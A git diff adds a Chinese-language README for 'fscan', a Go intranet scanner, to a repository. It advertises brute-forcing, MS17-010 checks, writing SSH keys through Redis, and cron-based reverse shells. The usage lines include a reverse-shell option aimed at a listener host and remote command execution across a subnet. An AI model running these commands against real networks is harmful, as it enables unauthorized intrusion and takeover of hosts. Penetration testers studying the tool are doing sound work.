diff --git a/README.md b/README.md index ce00ee2..8693b7f 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,36 @@ # fscan -一款内网扫描工具,方便一键自动化大保健。 + +一款内网扫描工具,方便一键大保健。 +支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写私钥、计划任务反弹shell、读取win网卡信息等。 +趁着最近有空,用go把f-scrack重构了一遍。使用go来编写,也有更好的扩展性及兼容性。 +还在逐步增加功能,欢迎各位师傅提意见。 + +## usege +``` +go run main.go -h 192.168.1.1/24 +fscan.exe -h 192.168.1.1/24 +fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写私钥) +fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) +fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行) +``` + +`fscan.exe -h 192.168.x.x` +![](image/1.png) + +`fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)` +![](image/2.png) + + +`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)` +![](image/3.png) + + +`fscan.exe -h 192.168.x.x (ms17010、读取网卡信息)` +![](image/4.png) + + +## 参考链接 +https://github.com/Adminisme/ServerScan +https://github.com/netxfly/x-crack +https://github.com/hack2fun/Gscan +https://github.com/k8gege/LadonGo \ No newline at end of file diff --git a/image/1.png b/image/1.png new file mode 100644 index 0000000..65b911c Binary files /dev/null and b/image/1.png differ diff --git a/image/2.png b/image/2.png new file mode 100644 index 0000000..31e6188 Binary files /dev/null and b/image/2.png differ diff --git a/image/3.png b/image/3.png new file mode 100644 index 0000000..fc90a8d Binary files /dev/null and b/image/3.png differ diff --git a/image/4.png b/image/4.png new file mode 100644 index 0000000..30ce69c Binary files /dev/null and b/image/4.png differ diff --git a/image/Snipaste_2020-11-13_22-51-04.png b/image/Snipaste_2020-11-13_22-51-04.png new file mode 100644 index 0000000..496459c Binary files /dev/null and b/image/Snipaste_2020-11-13_22-51-04.png differ